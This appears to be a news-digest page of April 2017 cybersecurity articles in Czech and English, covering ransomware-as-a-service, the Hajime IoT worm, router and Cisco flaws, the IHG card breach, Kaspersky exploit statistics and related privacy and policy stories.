Google hopes that by sharing its own experiences in developing and deploying tiered access, IT and security admins will feel empowered to develop a flexible and powerful access control system that better suits today's business. Its Tiered Access project goes hand-in-hand with the larger BeyondCorp project that challenges traditional security assumptions that private or 'internal' IP addresses represented a 'more trusted' device than those coming from the internet. Part of BeyondCorp is discussed in the Google Infrastructure Security Design Overview.
Hackerem se může stát kdokoliv. Stačí pár tisíc korun
20.4.2017 Novinky/Bezpečnost Kriminalita
V dnešní době se může stát hackerem doslova kdokoliv. Nepotřebuje k tomu žádné hluboké znalosti počítačových sítí, ani nemusí neustále hledat nové bezpečnostní trhliny v různých programech. Jak upozornil server The Hacker News, stačí k tomu pár tisíc korun.
Již více než dva roky jsou největší hrozbou podle bezpečnostních expertů vyděračské viry. Škodlivé kódy označované souhrnným nástrojem jsou totiž velmi sofistikované a dokážou v počítači nadělat velkou neplechu.
Kdo by si ale myslel, že je po celosvětové počítačové síti šíří výhradně ti nejprotřelejší počítačoví piráti, byl by na omylu. Na černém internetovém trhu si je může – podobně jako zbraně či drogy – koupit prakticky kdokoliv.
Vyděračský virus připravený na míru
Podle serveru The Hacker News se na černém trhu běžně nabízí například ransomware zvaný Karmen. Případní zájemci si jej mohou koupit od rusky hovořící skupiny DevBitox za pouhých 175 dolarů, tedy v přepočtu zhruba za necelých 4400 Kč.
Takto zakoupený nezvaný návštěvník je přitom přímo připravený na útok, stačí jej tedy jen nasměrovat na předem zvolenou oběť. Žádné další hlubší znalosti počítačové problematiky nejsou potřeba.
Útok škodlivého kódu Karmen přitom probíhá úplně stejně jako v případě dalších vyděračských virů. Ty nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.
Výkupné neplatit
Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné.
Uživatelé se přesto na podobné útoky mohou připravit. Stačí dodržovat základní doporučení bezpečnostních expertů, díky kterým zbytečně nezvaným návštěvníkům neotevřou zadní vrátka do svého počítače.
V Rusku zvažují zákaz VPN a proxy, které umožňují přístup na blokované weby
20.4.2017 Živě.cz BigBrother
Rusko patří k zemím s největším počtem blokovaných webů. Na černé listině tamního úřadu Roskomnadzor je téměř 70 tisíc stránek, které musí být zablokovány na úrovni poskytovatelů. Uživatelé však tato opatření obchází díky prostředkům jako VPN nebo proxy serverů, což se ruským institucím nelíbí. I proto se nyní na vládní úrovni začne projednávat návrh pro jejich zablokování – informoval o tom TorrentFreak.
Ruský Roskomnadzor chce po Opeře vestavěný blacklist. Uživatelé ji využívají pro prohlížení blokovaných webů
Nový zákon by ukládal poskytovatelům zablokovat všechny nástroje, které mohou být využity pro návštěvu zapovězených stránek – primárně jde o zmíněné VPN a proxy servery, zároveň to však mohou být i webové služby pro mirroring stránek nebo Tor. Do této definice by mimo jiné spadala také Opera, která obsahuje funkci VPN pro změny IP adresy.
Nový návrh následuje jiné opatření, které by mělo ovlivnit zobrazování výsledků ve vyhledávačích. Veškeré služby sloužící pro prohledávání webu by měly mít zakázáno zobrazit odkazy na blokované weby. V opačném případě jim bude hrozit pokuta v přepočtu asi 310 tisíc korun.
NSA už Windows ke špehování nezneužije, tvrdí Microsoft
20.4.2017 SecurityWorld BigBrother
Microsoft reaguje na kauzu s NSA a opravuje zranitelnosti, které toto agentura využívala ke svým špionážním účelům. Starší verze Windows však jsou – a zůstanou – zranitelné.
Microsoft oznámil, že opravil většinu kritických míst ve Windows, které údajně zneužívala ke špehování uživatelů Národní bezpečnostní agentura (NSA). Na její počínání před pár dny upozornila hackerská skupina Shadow Brokers, zveřejněním obsáhlé dokumentace svědčící o aktivitách agentury.
„Většinou šlo o mezery spadající do kategorie rizik, které jsme už dříve záplatovali v rámci našich dalších produktů,“ uvedl Philip Misner, jeden z bezpečnostních pracovníků Microsoftu, v internetovém příspěvku, v němž devět konkrétních případů přibližuje a to včetně nápravných aktualizací, spadajících do období října 2008 – března 2017.
Zmiňuje se však také o tom, že tři z kritických míst, na které Shadow Brokers poukazují, záplatovány nebyly a ani nebudou.
„Uživatelé Windows 7 a novějších, respektive Exchange 2010 a novějších, nejsou v ohrožení. Ti, kteří používají starší verze těchto produktů, by si je měli aktualizovat na novější, aby mohli být zahrnuti do naší podpory.“ Z jeho slov tedy jasně vyplývá, že uživatelé Windows starších než jsou „Sedmičky“ se mohou vystavovat riziku, kvůli ukončené podpoře Microsoftu.
Matt Suiche, zakladatel bezpečnostní společnosti Comae Technologies, v návaznosti na uniklé dokumenty dodává, že Národní bezpečnostní agentura využívala ve velkém mimo jiné chyb ve starších verzích Windows Server, především Windows Server 2003.
Uživatelům proto důrazně doporučuje aktualizaci svých systémů nebo rovnou update na nejnovější Windows 10. „Zneužít chyb ve Windows 10 je výrazně těžší než v případě Windows 7,“ dodává Suiche.
White Hat Hacker Created Mysterious IoT Worm, Symantec Says
20.4.2017 securityweek IoT
Hajime IoT Worm Appears to be Work of White Hat Hacker
An Internet of Things (IoT) worm that targets the same devices as the infamous Mirai botnet appears to be the work of a white hat hacker, Symantec researchers say.
Dubbed Hajime, the worm was initially discovered in October, just weeks after Mirai’s code emerged online, and Rapidity Networks researchers estimated at the time it had infected between 130,000 and 185,000 devices. The malware was using the same username and password combinations as Mirai, and was focused on compromising the very same insecure IoT devices.
At the time, however, Rapidity Networks suggested that the malware could be only a research project, as it had no other components than the spread module. Basically, while Mirai remains focused on ensnaring devices to abuse them in distributed denial of service (DDoS) attacks, Hajime doesn't appear to have a malicious component.
Six months later, nothing has changed in this regard, and the worm continues to pack only the spread module, with its actual purpose still a mystery, Symantec says. However, the security researchers do note that the malware installs a backdoor on the compromised devices, which could be used for nefarious purposes.
At the moment the malware only fetches a statement from its controller and displays it on the terminal approximately every 10 minutes, researchers say. The statement claims that a white hat is behind the code, and that they are “securing some systems.”
The operator has the option to open a shell script to any infected machine in the network at any time, and has designed Hajime to accept only messages signed by a hardcoded key. Thus, it’s clear that the message Hajime displays on the terminal comes from the author.
Hajime is a peer-to-peer botnet, meaning that there is no single command and control (C&C) address that it has to connect to when receiving commands. Instead, its operator can push commands to the network and wait for them to propagate to all peers over time.
The malware appears more advanced compared to Mirai, and researchers discovered that it takes multiple steps in an attempt to hide its presence on the system. Courtesy of Hajime’s modular design, the operator can add new capabilities to it on the fly. According to Symantec, the author has invested a “fair amount of development time” in this creation.
“However, there is a question around trusting that the author is a true white hat and is only trying to secure these systems, as they are still installing their own backdoor on the system. The modular design of Hajime also means if the author’s intentions change they could potentially turn the infected devices into a massive botnet,” the security firm explained.
On the other hand, once it has infected a device, the malware attempts to improve security by blocking access to ports 23, 7547, 5555, and 5358. These ports are already known to be hosting services that are exploitable by many threats, including Mirai.
Hajime’s behavior is similar to that of the Wifatch, also known as the “vigilante malware,” and isn’t viewed as an effective approach to securing IoT devices. The effects of white worms are only temporary, because the changes are made only in RAM and cannot persist reboots.
“Once the device is rebooted it goes back to its unsecured state, complete with default passwords and a Telnet open to the world. To have a lasting effect, the firmware would need to be updated. It is extremely difficult to update the firmware on a large scale because the process is unique to each device and in some cases is not possible without physical access,” Symantec said.
This also means that there’s a constant battle between Hajime, Mirai and other IoT malware out there to take over exposed devices. This battle is a cycle that repeats after each device reboot. Only newer, more secure firmware can end it, researchers say.
As it turns out, the worm’s author is keeping tracks of reports on the malware, and has adopted the Hajime name after Rapidity Networks called the threat this way last year, to keep it in line with Mirai’s Japanese naming (Mirai means “future” in Japanese, Hajime means “beginning”). Further, it appears that the author also addressed some bugs in the code after security researchers pointed them out in their October report.
According to Symantec, while it’s difficult to estimate the size of the network, “modest estimates put it in the tens of thousands.” The researchers also reveal that most of the infected machines are located in Brazil (19%), followed by Iran (17%), Thailand (11%), Russian Federation (11%), Turkey (8%), Vietnam (8%), Argentina (7%), Australia (7%), China (6%), and Taiwan (6%).
“What is needed to protect organizations from the perils of vulnerable IoT devices is a least privilege approach. IoT devices should be hard coded to only communicate with the local server or the manufacturer’s server across the Internet. Organizations should define policies aligned to the IP addresses and layer 4 ports these devices must use to operate and deny all others. Network Traffic Analysis technologies can be used to monitor traffic to and from IoT devices and alert if they send or receive any traffic that falls outside the least privilege policy,” Bob Noel, Director of Strategic Relationships and Marketing for Plixer International, told SecurityWeek in an emailed statement.
Bose Wireless Headphones Spy on Users, Lawsuit Claims
20.4.2017 securityweek CyberSpy
Bose Headphones Join the Internet of Spying Things
Bose wireless headphones, that sell for up to $350, collect the listening habits of users via an associated app. This data is transmitted to Bose, who then passes the data to a marketing company, a lawsuit alleges. One aggrieved user brought the class action suit against Bose, alleging infringement of the federal Wiretap Act and numerous state laws.
Illinois case 17-cv-2928, brought by Bose customer Kyle Zak "on behalf of others similarly situated" claims the case is worth more than $5 million; but without specifying damages, seeks a jury trial.
The lawsuit states that Bose introduced a mobile phone app, the Bose Connect, in 2016 to remotely control and manage the headphones via a Bluetooth connection. Bose advertised this with the claim, the "Bose Connect app unlocks current and future headphone features. Download now."
Unknown to the customer, states the lawsuit, Bose "designed Bose Connect to (i) collect and record the titles of the music and audio files its customers choose to play through their Bose wireless products and (ii) transmit such data along with other personal identifiers to third-parties -- including a data miner -- without its customers' knowledge or consent."
Since Bose also asks for the name, email address and the product's serial number, it is able to build detailed listening habits of known individuals.
These listening habits can help produce a personal profile of the customer. The lawsuit claims that "numerous scientific studies show that musical preferences reflect explicit characteristics such as age, personality, and values, and can likely even be used to identify people with autism spectrum conditions." Audio podcasts can be even more revealing, potentially identifying the race, religion, sexual orientation and health issues of the listener.
Such privacy issues usually revolve around the concept of informed consent. Zak claims that he would not have purchased the headphones had he been aware of the data collection. The privacy policy with the app, however, makes it clear that Bose collects data, tracks the user and shares that data. "We share the information that we collect with a variety of third parties. Additionally, other third parties collect information directly through the app."
This clear statement would be a red flag to any privacy-conscious user. However, by the time it is seen, the user will almost certainly have already spent up to $350 on the headphones themselves. Although they can function without the app, it is the app that maximizes their quality.
Zak is represented by Christopher Dore, a partner at Edelson PC. According to Reuters, Edelson specializes in suing technology companies over alleged privacy violations. Dore told Reuters that customers do not see the Bose app's user service and privacy agreements when signing up, and the privacy agreement says nothing about data collection.
This last comment is either wrong, or the app's privacy policy has since been updated.
In February 2017, Smart TV manufacturer Vizio agreed to pay an FTC settlement of $2.2 million over allegations that it collected information on users viewing habits without their knowledge. Although the settlement did not include an admission of 'guilt', Vizio will now prominently display its wish to collect data, and ensure it obtains affirmative express consent.
Late last year, a team of researchers demonstrated how a piece of malware could spy on users by silently turning their headphones into a microphone that can capture audio data from a significant distance. Early this year, German regulators banned an internet-connected doll called "My Friend Cayla" after warning that it was a de facto "spying device".
Experts Find 10 Flaws in Linksys Smart Wi-Fi Routers
20.4.2017 securityweek Vulnerebility
Researchers at IOActive have analyzed Linksys routers and discovered a total of 10 vulnerabilities. Patches have yet to be released, but the vendor has provided some mitigation advice.
The research has focused on Linksys routers that support the Smart Wi-Fi feature, which enables users to manage and control their home wireless network remotely from a mobile application. According to Linksys, the vulnerabilities found by IOActive affect 25 EA and WRT series routers.
IOActive will not disclose any specific information until Linksys releases firmware updates and users have had a chance to patch their devices. However, experts said the vulnerabilities they have identified can be exploited to cause a denial-of-service (DoS) condition, obtain potentially sensitive data, and even to plant backdoors.Linksys routers vulnerable to attacks
Two of the flaws can be used for DoS attacks. Unauthenticated hackers can cause the router to become unresponsive or reboot by sending specially crafted requests to a specific API. Exploitation of these flaws disrupts network connections and prevents device administrators from accessing the web interface.
Authentication bypass vulnerabilities allow attackers to access certain CGI scripts that provide access to various types of information, including firmware and Linux kernel versions, running processes, connected USB devices, and the WPS PIN. Attackers can also collect data on firewall configurations, FTP settings, and SMB server settings.
IOActive also warned that attackers who do manage to log in to the router can inject and execute commands on the device’s operating system with root privileges. This allows them to create backdoor accounts that are not visible to legitimate administrators.
However, researchers pointed out that they did not manage to find an authentication bypass that can allow an attacker to exploit this vulnerability – the authentication bypass they did find only provides access to some CGI scripts, not the API that enables these more damaging attacks.
A Shodan search conducted by IOActive revealed 7,000 vulnerable devices that can be accessed directly from the Internet. Nearly 70 percent of them were located in the United States, followed by Canada, Hong Kong, Chile, Netherlands, Venezuela, Argentina, Russia, Sweden, Norway, China, India, UK and Australia.
While researchers have not found a way to bypass authentication in order to exploit the command injection vulnerability, they did determine that 11 percent of the 7,000 exposed devices had been using default credentials.
IOActive reported the vulnerabilities to Linksys in mid-January. The vendor is working on releasing firmware updates for affected devices and, in the meantime, it has provided some mitigation advice. The company recommends temporarily disabling the Guest Network feature, and changing the default admin password.
This research was conducted just a few months after IOActive reported finding multiple vulnerabilities in BHU Wi-Fi uRouter, a device manufactured and sold in China.
Cisco Fixes Serious Flaws in Security, Other Products
20.4.2017 securityweek Vulnerebility
Cisco has released software updates for its Firepower, IOS, Adaptive Security Appliance (ASA) and Unified Communications Manager (Unified CM) products to address high severity denial-of-service (DoS) vulnerabilities.
One of the flaws, identified as CVE-2016-6368, can affect several products running Cisco Firepower System Software, including ASA, Advanced Malware Protection (AMP), Firepower, Sourcefire 3D and Industrial Security appliances. An unauthenticated attacker can exploit the vulnerability remotely to cause a DoS condition.
Related: Cisco Launches New Firepower Firewalls
A DoS vulnerability (CVE-2017-3808) that can be exploited by a remote, unauthenticated attacker has also been found in Cisco Unified CM, namely in the session initiation protocol UDP throttling process.
Several high severity DoS flaws have also been discovered in the EnergyWise module of Cisco’s IOS and IOS XE software. EnergyWise is designed for monitoring and managing the power usage of devices in a domain, including networking devices and Power over Ethernet (PoE) endpoints.
Cisco has also published four advisories describing remotely exploitable weaknesses in its ASA software. The security holes affect components such as the IKEv1 XAUTH code, the SSL/TLS code, IPsec code and DNS code.
Two of the vulnerabilities can be exploited by an unauthenticated attacker, while the other two require authentication.
Most of these flaws have been discovered by Cisco itself and there is no evidence that any of them have been exploited for malicious purposes.
Cisco is one of the several tech companies whose products have been targeted by exploits described recently by WikiLeaks as part of a dump called “Vault 7.” The networking giant has discovered a zero-day vulnerability affecting many of its switches.
Patches have yet to be made available for the flaw and Cisco warned customers last week that a researcher has released a proof-of-concept (PoC) exploit.
Exploits: how great is the threat?
20.4.2017 Kaspersky Exploit
How serious, really, is the danger presented by exploits? The recent leak of an exploit toolset allegedly used by the infamous Equation Group suggests it’s time to revisit that question. Several zero-days, as well as a bunch of merely ‘severe’ exploits apparently used in-the-wild were disclosed, and it is not yet clear whether this represents the full toolset or whether there’s more to come, related to either Equation or another targeted threat actor.
Of course, Equation Group is not the first, and is certainly not the only sophisticated targeted attacker to use stealthy, often zero-day exploits in its activity.
Today we are publishing an overview of the exploit threat landscape. Using our own telemetry data and intelligence reports as well as publically available information, we’ve looked at the top vulnerabilities and applications exploited by attackers.
We have examined them from two equally important perspectives. The first part of the report summarises the top exploits targeting all users in 2015-2016, and the most vulnerable applications. The second part considers the vulnerabilities exploited between 2010 and 2016 by significant targeted threat actors reported on by Kaspersky Lab: that’s 35 actors and campaigns in total.
Key findings on exploits targeting all users in 2015-2016:
In 2016 the number of attacks with exploits increased 24.54%, to 702,026,084 attempts to launch an exploit.
4,347,966 users were attacked with exploits in 2016 which is 20.85% less than in the previous year.
The number of corporate users who encountered an exploit at least once increased 28.35% to reach 690,557, or 15.76% of the total amount of users attacked with exploits.
Browsers, Windows, Android and Microsoft Office were the applications exploited most often – 69.8% of users encountered an exploit for one of these applications at least once in 2016.
In 2016, more than 297,000 users worldwide were attacked by unknown exploits (zero-day and heavily obfuscated known exploits).
2015-2016 witnessed a number of positive developments in the exploit threat landscape. For example, two very dangerous and effective exploit kits – Angler (XXX) and Neutrino, left the underground market, depriving cybercriminals community of a very comprehensive set of tools created to hack computers remotely.
A number of bug bounty initiatives aimed at highlighting dangerous security issues were launched or extended. Together with the ever-increasing efforts of software vendors to fix new vulnerabilities, this significantly increased the cost to cybercriminals of developing new exploits. A clear victory for the infosec community that has resulted in a drop of just over 20% in the number of private users attacked with exploits: from 5.4 million in 2015 to 4.3 million in 2016.
However, alongside this welcome decline, we’ve registered an increase in the number of corporate users targeted by attacks involving exploits. In 2016, the number of attacks rose by 28.35% to reach more than 690,000, or 15.76% of the total amount of users attacked with exploits. In the same year, more than 297,000 users worldwide were attacked by unknown exploits. These attacks were blocked by our Automatic Exploit Prevention technology, created to detect this type of exploits.
Key findings on exploits used by targeted attackers 2010 -2016:
Overall, targeted attackers and campaigns reported on by Kaspersky Lab in the years 2010 to 2016 appear to have held, used and re-used more than 80 vulnerabilities. Around two-thirds of the vulnerabilities tracked were used by more than one threat actor.
Sofacy, also known as APT28 and Fancy Bear seems to have made use of a staggering 25 vulnerabilities, including at least six, if not more zero-days. The Equation Group is not far behind, with approximately 17 vulnerabilities in its arsenal, of which at least eight were zero-days, according to public data and Kaspersky Lab’s own intelligence.
Russian-speaking targeted attack actors take three of the top four places in terms of vulnerability use (the exception being Equation Group in second place), with other English- and Chinese-speaking threat actors further down the list.
Once made public, a vulnerability can become even more dangerous: grabbed and repurposed by big threat actors within hours.
Targeted attackers often exploit the same vulnerabilities as general attackers – there are notable similarities between the list of top vulnerabilities used by targeted threat actors in 2010-2016, and those used in all attacks in 2015-2016.
When looking more closely at the applications used by targeted threat actors to mount exploit-based attacks, we weren’t surprised to discover that Windows, Flash and Office top the list.
Applications and Operation Systems most often exploited by targeted attack groups.
Moreover, the recent leak of multiple exploits allegedly belonging to the Equation cyberespionage group highlighted another known but often overlooked truth: the life of an exploit doesn’t end with the release of a security patch designed to fix the vulnerability being exploited.
Our research suggests that threat actors are still actively and successfully exploiting vulnerabilities patched almost a decade ago – as can be seen in the chart below:
Everyone loves an exploit
Exploits are an effective delivery tool for malicious payloads and this means they are in high demand among malicious users, whether they are cybercriminal groups, or targeted cyberespionage and cybersabotage actors.
To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.
Conclusion and Advice
The conclusion is a simple one: even if a malicious user doesn’t have access to expensive zero-days, the chances are high that they’d succeed with exploits to old vulnerabilities because there are many systems and devices out there that have not yet been updated.
Even though developers of popular software invest huge resources into finding and eliminating bugs in their products and exploit mitigation techniques, for at least the foreseeable future the challenge of vulnerabilities will remain.
In order to protect your personal or business data from attacks via software exploits, Kaspersky Lab experts advise the following:
Keep the software installed on your PC up to date, and enable the auto-update feature if it is available.
Wherever possible, choose a software vendor which demonstrates a responsible approach to a vulnerability problem. Check if the software vendor has its own bug bounty program.
If you are managing a network of PCs, use patch management solutions that allow for the centralized updating of software on all endpoints under your control.
Conduct regular security assessments of the organization’s IT infrastructure.
Educate your personnel on social engineering as this method is often used to make a victim open a document or a link infected with an exploit.
Use security solutions equipped with specific exploit prevention mechanisms or at least behavior-based detection technologies
Give preference to vendors which implement a multilayered approach to protection against cyberthreats, including exploits.
Hackers Steal Payment Card Data From Over 1,150 InterContinental Hotels
20.4.2017 thehackernews CyberCrime
InterContinental Hotels Group (IHG) is notifying its customers that credit card numbers and other sensitive information may have been stolen after it found malware on payment card systems at 1,174 franchise hotels in the United States.
It's the second data breach that U.K.-based IHG, which owns Holiday Inn and Crowne Plaza, has disclosed this year. The multinational hotel conglomerate confirmed a credit card breach in February which affected 12 of its hotels and restaurants.
What happened?
IHG identified malware accessing payment data from cards used at front desk systems between September 29 and December 29, 2016, but the malware was erased after the investigation got completed in March 2017.
"Many IHG-branded locations are independently owned and operated franchises and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations," read the notice published to IHG’s site on Friday.
What type of information?
The malware obtained credit card data, such as cardholders' names, credit card numbers, expiration dates and internal verification codes, from the card's magnetic stripe, although the company said there is no evidence of any unauthorized access to payment card data after late December.
However, the company can not confirm that the malware was removed until February and March 2017, when it began its investigation around the data breach.
How many victims?
The total number of affected customers is not revealed by the company, although customers can use a lookup tool IHG has posted on its website to search for hotels by city and state.
The company says this most recent breach mostly affects guests from U.S-based hotels, who stayed between September 29 and December 29, 2016. The 1,174 hotels breached in the US include, 163 in Texas, 64 in California, 61 in Florida, 53 in Indiana, 50 in Ohio, 45 in New York, 42 in Michigan, 39 in Illinois, among others.
Only one hotel in Puerto Rico, a Holiday Inn Express in San Juan, is the non-U.S. hotel that was hit by malware.
Who are not affected by the breach?
Those franchise hotel locations that had implemented IHG's Secure Payment Solution (SPS) – a point-to-point encryption payment acceptance solution – before 29th September 2016 were not affected by this data breach.
IHG is advising all franchise hotels to implement SPS in order to protect themselves from such malware attacks, though the company also said, many more properties implemented SPS after September 29, 2016, which ended the malware’s ability to find payment card data.
What is the IHG doing?
IHG has already notified law enforcement of the recent data breach.
Moreover, on behalf of franchisees, the company has been working closely with the payment card networks and the cyber security firm to confirm that the malware has been removed and evaluate ways for franchisees to enhance security measures.
What should IHG customers do?
Users are advised to review their payment card statements carefully and to report any unauthorized bank transactions.
You should also consider requesting a replacement card if you visited any of the affected properties during that three months duration when the breach was active.
"The phone number to call is usually on the back of your payment card. Please see the section that follows this notice for additional steps you may take," the company says.
IHG became the latest hotel chain to report a potential customer data breach in past few years, following the data breach in Hyatt, Hilton, Mandarin Oriental, Starwood, White Lodging and the Trump Collection that acknowledged finding malware in their payment systems.
Exfiltrating data from laptop and smartphones via ambient light sensors
20.4.2017 securityaffairs Mobil
A security researcher presented a method to exfiltrate sensitive data from a laptop or a smartphone through built-in ambient light sensors.
The security expert Lukasz Olejnik discovered that it is possible to steal sensitive data exploiting the ambient light sensors built-in many smartphones and laptops.
The ambient light sensors are installed on electronic devices to automatically change the screen brightness, but Olejnik is warning of the intention of the World Wide Web Consortium (W3C) “whether to allow websites access the light sensor without requiring the user’s permission.”
In this way, an attacker can analyze variations in brightness through ambient light sensors and steal sensitive data such as a QR code included on a web page that are used for authentication mechanisms.
“How exactly can ambient light readings allow extracting private data? Our attack is based on two observations:
The color of the user’s screen can carry useful information which websites are prevented from directly accessing for security reasons.
Light sensor readings allow an attacker to distinguish between different screen colors.” wrote Olejnik in a blog post.
As example, Olejnik reminds us that many sites change the color of links once a user has visited them, then the expert used the ambient light sensors to detect these changes and access users’ browsing history.
“For privacy reasons, browsers lie to developers about the colors of links displayed on a page; otherwise a malicious developer could apply :visited styles and detect which websites are present in the user’s history.” continues Olejnik.
The expert highlighted that such kind of attack is very slow, it took 48 seconds to detect a 16-character text string and three minutes and twenty seconds to recognize a QR code.
“In principle, browser sensors can deliver a 60 Hz readout rate. However, this does not mean that we can actually extract 60 bits per second – that’s because the ultimate detection limit is tied to the rate at which a change in screen brightness can be detected by the sensor.” explained Olejnik.
In the test conducted by the expert he and his team measured a screen brightness to readout latency of 200-300ms, and for a fully reliable exploit it’s more realistic to assume one bit per 500ms.
Below examples of detection times obtainable at the above rate:
Plain text string of 8 characters: 24 seconds (assuming 6 bits per character for an alphanumeric string rendered in a known font)
Plain text string of 16 characters: 48 seconds
20×20 QR code: 3 minutes 20 seconds
Detecting 1000 popular URLs in the history: 8 minutes 20 seconds
64×64 pixel image: 34 minutes 8 second
The good news is that the attack in some cases is not feasible because users would not keep a QR code on the screen for so long time.
Olejnik also proposes a countermeasure to mitigate the attack by limiting the frequency of ambient light sensors readings by API and quantized their output. In this way, the countermeasure will not impact the activity of the sensors preventing any abuse.
“The current proposal argues that the following protections are sufficient:
Limit the frequency of sensor readings (to much less than 60Hz)
Limit the precision of sensor output (quantize the result)” concluded Olejnik.
Introduction to the NIST CyberSecurity Framewor for a Landscape of Cyber Menaces
20.4.2017 securityaffairs Cyber
The implementation of the NIST CyberSecurity Framework is of vital importance for the changes taking place in the landscape of zero-day threats
The NIST CyberSecurity Framework is a guide for businesses and enterprises of good practices for information security. The NIST CyberSecurity Framework proposes a guide, which can adapt to each enterprise e for different needs.
The framework gives enterprises and businesses the possibility of applying the principles and the best practices of risk management to upgrade security and resilience of critical infrastructure. It provides organization and structure for the different insights of our time, with the best practices already adopted across the industry.
The Framework is an approach based on risk to manage cyber security risks and is composed of three parts: Framework Core, Framework Implementation Tiers, and Framework Profiles. Each part of the component of the Framework enforces the connection between business owners and the activities of cyber security.
In its composition, the Framework Core has five concurrent functions and continuous: Identity, Protect, Detect, Respond and Recover.
When placed together these functions give a strategic approach to the high level of the life cycle of risk management for cyber security of an organization. The Framework Implementation Tiers gives the context in which an organization understands the risk of cyber security and the processes established to manage that risk.
The Framework Profile can be defined as an alignment of patterns, guides, and practices of the Framework Core in a particular scenario of implementation. The Framework Profile can be used to identify opportunities for improving cyber security posture by comparing the actual Profile (“how it is”) with the target Profile (“how it will be”).
By being adaptive, the NIST CyberSecurity Framework can detect and respond to the new threats that appear from out of the thin air. This includes ransomware, IoT hacking and other new types of malware. The Risk Management is treated as an ongoing process to identify, assess and respond to risk. To manage risk it is proposed that organizations must understand the probability of occurrence of an event and the impact resulting from it.
This information gives organizations the capability of determining the acceptable risk level for delivering services, which is expressed by its risk tolerance. This understanding gives organizations the capacity of prioritizing the cyber security activities. It is important to adapt so organizations can respond. The NIST CyberSecurity Framework is available for small business, critical infrastructure services and organizations.
As cloud, big data and analytics reach a new level so does the possibility of damages for the health care, power grid, IoT and businesses. The Framework is elaborated in the form of Tier to cover all aspects of information security covering assets and employees best practices. This approach gives organizations the ability to isolate threats, in such way that detection and mitigation do not affect other assets of the organization.
Source:
https://gcn.com/articles/2017/03/31/cybersecurity-framework-revisions.aspx
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf
http://csrc.nist.gov/groups/SMA/fisma/sp800-53r5_pre-draft.html
http://www.govinfosecurity.com/groups-say-nist-must-better-address-healthcares-cyber-needs-a-9841
http://www.nextgov.com/cybersecurity/2017/04/bill-improve-small-business-cybersecurity-advances/136750/
http://blog.executivebiz.com/2017/04/tech-firms-urge-nist-to-include-vulnerability-disclosure-processes-in-cybersecurity-framework/
http://www.govinfosecurity.com/groups-say-nist-must-better-address-healthcares-cyber-needs-a-9841
https://www.nist.gov/news-events/news/2014/10/nist-releases-final-version-smart-grid-framework-update-30
https://www.nist.gov/itl/ssd/systems-interoperability-group/health-it-testing-infrastructure
Drupal Patches Critical Access Bypass Flaw
20.4.2017 securityweek Vulnerebility
Updates released for versions 8.2 and 8.3 of the Drupal content management system (CMS) address a critical access bypass vulnerability.
The flaw, discovered by Drupal developer Samuel Mortenson and tracked as CVE-2017-6919, has been classified as critical by the Drupal security team, but it only affects websites if certain conditions are met.
Websites are vulnerable to attacks exploiting this flaw if they have the RESTful Web Services (RESTWS) module enabled and they allow PATCH requests. The attacker must also be able to register an account on the targeted site.
Nevertheless, the security hole is potentially serious, which is why Drupal developers have released a patch not only for the 8.3 branch, but also for the 8.2 series, which has reached end of life and will not receive other updates.
Drupal has advised 8.2.x users to update to Drupal 8.2.8, but still recommends updating to Drupal 8.3 at a later time. In the case of Drupal 8.3, the vulnerability has been patched with the release of version 8.3.1. Drupal 7 is not affected.
Vulnerabilities involving the RESTWS module have been known to be exploited in the wild. In September 2016, researchers spotted attempts to exploit a RESTWS flaw that had been patched two months earlier.
The latest updates come only one day after Drupal announced the availability of a patch for a critical flaw affecting a popular third-party module.
The References module, used by more than 121,000 websites, had not been updated since 2013 and Drupal flagged it as unsupported. However, Drupal has managed to find a new maintainer for the module and the security hole has been fixed.
Symantec is monitoring the Hajime IoT malware, is it the work of vigilante hacker?
20.4.2017 securityaffairs IoT
Symantec observed the Hajime IoT malware leaving a message on the devices it infects, is it the work of a cyber vigilante?
The Mirai botnet is the most popular thingbot, it is targeting poorly configured and flawed ‘Internet of Things’ devices since August 2016, when the threat was first discovered by the researcher MalwareMustDie.
Many other bots threaten the IoT landscape, but recently an antagonist appeared in the wild, its name is Hajime.
Hajime has been spreading quickly in the last months, mostly in Brazil and Iran.
The Hajime malware was first spotted in October 2016, it used the same mechanism implemented by Mirai to spread itself. The threat targets unsecured IoT devices with open Telnet ports and still used default passwords. Researchers discovered Hajime uses the same list of username and password combinations that Mirai, plus two more.
Unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.
“There isn’t a single C&C server address, instead the controller pushes command modules to the peer network and the message propagates to all the peers over time. This is typically considered a more robust design as it makes takedowns more difficult.” reads the analysis published by Symantec.
Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes. The threat has a modular structure allowing operators to add new capabilities on the fly.
The analysis of the Hajime reveals that it doesn’t implement denial of service (DDoS) capabilities or any other attacking code. Symantec researchers noticed that Hajime fetches a statement from its controller and displays it on the terminal every 10 minutes. The message is:
Just a white hat, securing some systems. Important messages will be signed like this!
Hajime Author.
Contact CLOSED
Stay sharp!
The message is digitally signed and the worm will only accept messages signed by a hardcoded key. Once infected a system, the worm blocks access to ports 23, 7547, 5555, and 5358, in order to prevent attacks from other IoT threats, including Mirai.
Experts believe Hajime could be the work of a cyber vigilante, in the past we have observed similar codes like the Linux.Wifatch discovered by Symantec in October 2015.
“The problem with these white worms is that they usually turn out to have a short lifespan. That is because their effects are only temporary. On the typical IoT system affected by these worms the changes made to improve the security are only in RAM and not persistent.” observed Symantec.
In the broadcast message, the author refers to themselves as the “Hajime Author” but the name Hajime appears nowhere in the binaries. The name “Hajime” didn’t come from the author, but from the researchers who discovered the malware.
